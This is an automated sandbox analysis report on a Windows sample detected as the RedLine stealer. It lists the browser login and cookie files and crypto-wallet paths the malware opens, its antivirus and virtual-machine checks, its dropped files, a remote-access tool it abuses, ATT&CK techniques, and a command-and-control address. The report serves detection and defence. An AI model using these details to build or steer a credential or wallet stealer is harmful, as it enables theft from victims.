                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exe Code function: 0_2_00007FF6F6DA3D00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6F6DA3D00
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C505C6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_69C505C6
                                Source: C:\ProgramData\WinNet\AnyDesk.exe Code function: 19_2_69C32A20 GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetVersionExW,GetNativeSystemInfo,GetModuleHandleW,GetProcAddress,19_2_69C32A20
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: gg.exe, 00000012.00000002.1804484350.00000000016F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                Source: Yara match File source: dump.pcap, type: PCAP
                                Source: Yara match File source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.embedded.exe.1a0bad00098.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.embedded.exe.1a0bad00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 14.0.gg.exe.7a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara match File source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: SysrI6zSkJ.exe PID: 6472, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: embedded.exe PID: 6904, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR
                                Source: Yara match File source: C:\ProgramData\WinNet\gg.exe, type: DROPPED
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR^q
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR^qL
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `,^qdC:\Users\user\AppData\Roaming\Binance
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q&%localappdata%\Coinomi\Coinomi\walletsLR^q
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\atomic\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
                                Source: C:\ProgramData\WinNet\gg.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                Source: Yara match File source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara match File source: dump.pcap, type: PCAP
                                Source: Yara match File source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.embedded.exe.1a0bad00098.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.embedded.exe.1a0bad00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 14.0.gg.exe.7a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara match File source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: SysrI6zSkJ.exe PID: 6472, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: embedded.exe PID: 6904, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara match File source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR
                                Source: Yara match File source: C:\ProgramData\WinNet\gg.exe, type: DROPPED

                                ATT&CK matrix (cell layout and per-cell counts not recoverable from the extracted text)

                                Tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact

                                Techniques listed with a count in the matrix: Scripting; Valid Accounts; Windows Management Instrumentation; DLL Side-Loading; Disable or Modify Tools; OS Credential Dumping; System Time Discovery; Archive Collected Data; Encrypted Channel; Command and Scripting Interpreter; Deobfuscate/Decode Files or Information; Input Capture; File and Directory Discovery; Data from Local System; Non-Standard Port; Access Token Manipulation; Obfuscated Files or Information; System Information Discovery; Non-Application Layer Protocol; Registry Run Keys / Startup Folder; Process Injection; Software Packing; Security Software Discovery; Application Layer Protocol; Timestomp; Process Discovery; Virtualization/Sandbox Evasion; Masquerading; Application Window Discovery; Modify Registry; Hidden Files and Directories; Rundll32
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph
ID: 1402122
Sample: SysrI6zSkJ.exe
Startdate: 03/03/2024
Architecture: WINDOWS
Score: 76

DNS/IP info:
• relay-6a630189.net.anydesk.com
• d1atxff5avezsq.cloudfront.net
• 2 other IPs or domains

Signatures:
• Snort IDS alert for network traffic
• Found malware configuration
• Multi AV Scanner detection for submitted file
• 4 other signatures

Process tree (indentation shows which process started which; numbers in parentheses are the counters shown on the graph node):

SysrI6zSkJ.exe (4)
  dropped: C:\ProgramData\WinNet\gg.exe, PE32
  dropped: C:\ProgramData\WinNet\embedded.exe, PE32+
  dropped: C:\ProgramData\WinNet\p.vbs, ASCII
  signature: Uses cmd line tools excessively to alter registry or file data
  cmd.exe (1)
    embedded.exe (1)
      dropped: C:\ProgramData\WinNet\AnyDesk.exe, PE32
      signature: Multi AV Scanner detection for dropped file
      signature: Uses cmd line tools excessively to alter registry or file data
      cmd.exe (1)
        AnyDesk.exe (14)
          signature: Detected unpacking (changes PE section rights)
          signature: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
          signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          signature: 3 other signatures
          AnyDesk.exe
            DNS/IP: 18.173.219.85, 49735, 80 MIT-GATEWAYSUS United States
            DNS/IP: relay-6a630189.net.anydesk.com 64.31.23.26, 443, 49733, 49734 LIMESTONENETWORKSUS United States
            DNS/IP: boot.net.anydesk.com 185.229.191.44, 443, 49731, 49732 CDN77GB Czech Republic
            dropped: C:\Users\user\AppData\Local\Temp\gcapi.dll, PE32
            dropped: C:\ProgramData\WinNet\gcapi.dll, PE32
          AnyDesk.exe
        conhost.exe
      cmd.exe
        wscript.exe
          gg.exe (5, 2)
            signature: Tries to steal Crypto Currency Wallets
        conhost.exe
      reg.exe (1)
        conhost.exe
    conhost.exe
  cmd.exe (3, 2)
    wscript.exe (1)
      signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
      gg.exe (5, 4)
        DNS/IP: 67.203.7.148, 2909, 49729, 49730 AS-COLOAMUS United States
        signature: Multi AV Scanner detection for dropped file
        signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
        signature: Found many strings related to Crypto-Wallets (likely being stolen)
        signature: 2 other signatures
    conhost.exe
  reg.exe (1, 1)
    conhost.exe
gg.exe
  signature: Tries to harvest and steal browser information (history, passwords, etc)
  signature: Tries to steal Crypto Currency Wallets
rundll32.exe

Source | Detection | Scanner | Label | Link
SysrI6zSkJ.exe | 39% | ReversingLabs | Win64.Spyware.RedLine |

Source | Detection | Scanner | Label | Link
C:\ProgramData\WinNet\AnyDesk.exe | 0% | ReversingLabs | |
C:\ProgramData\WinNet\embedded.exe | 58% | ReversingLabs | Win64.Spyware.RedLine |
C:\ProgramData\WinNet\gcapi.dll | 0% | ReversingLabs | |
C:\ProgramData\WinNet\gg.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.RedlineStealer |
C:\Users\user\AppData\Local\Temp\gcapi.dll | 0% | ReversingLabs | |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.ip.sb/ip | 0% | URL Reputation | safe |
http://tempuri.org/Entity/Id12Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id13ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id23ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/ | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id6ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id2Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id15Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id1ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id24Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id10ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id21ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id5Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id8Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id15ResponseD | 0% | Avira URL Cloud | safe |
67.203.7.148:2909 | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id10Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/D | 0% | Avira URL Cloud | safe |
https://dartbug.com/52121. | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id12ResponseD | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id13Response | 0% | Avira URL Cloud | safe |
http://tempuri.org/Entity/Id7ResponseD | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
relay-6a630189.net.anydesk.com | 64.31.23.26 | true | false | | high
d1atxff5avezsq.cloudfront.net | 18.173.219.36 | true | false | | high
boot.net.anydesk.com | 185.229.191.44 | true | false | | high
api.playanext.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
67.203.7.148:2909 | true | Avira URL Cloud: safe | unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.openssl.org/)AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                high
                                                                                                                                https://anydesk.com/pricing/teams)AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id5Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsgg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://tempuri.org/Entity/Id15ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://tempuri.org/Entity/Id10Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Renewgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tempuri.org/Entity/Id8Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://support.anydesk.com/knowledge/quick-start-guidewJAnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.gimp.org/xmp/AnyDesk.exe, 00000010.00000002.2893264351.0000000006E60000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891388326.00000000047A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentitygg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://anydesk.com/de/datenschutzAnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeygg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://dartbug.com/52121.embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://my.anydesk.comAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.anydesk.com/knowledge/waiting-for-image-black-screenhAnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.openssl.org/support/faq.htmlAnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://tempuri.org/Dgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingexgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/dart-lang/sdk/blob/master/runtime/docs/compiler/aot/entry_point_pragma.mdembedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://anydesk.com/pricing/teamsAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                        high
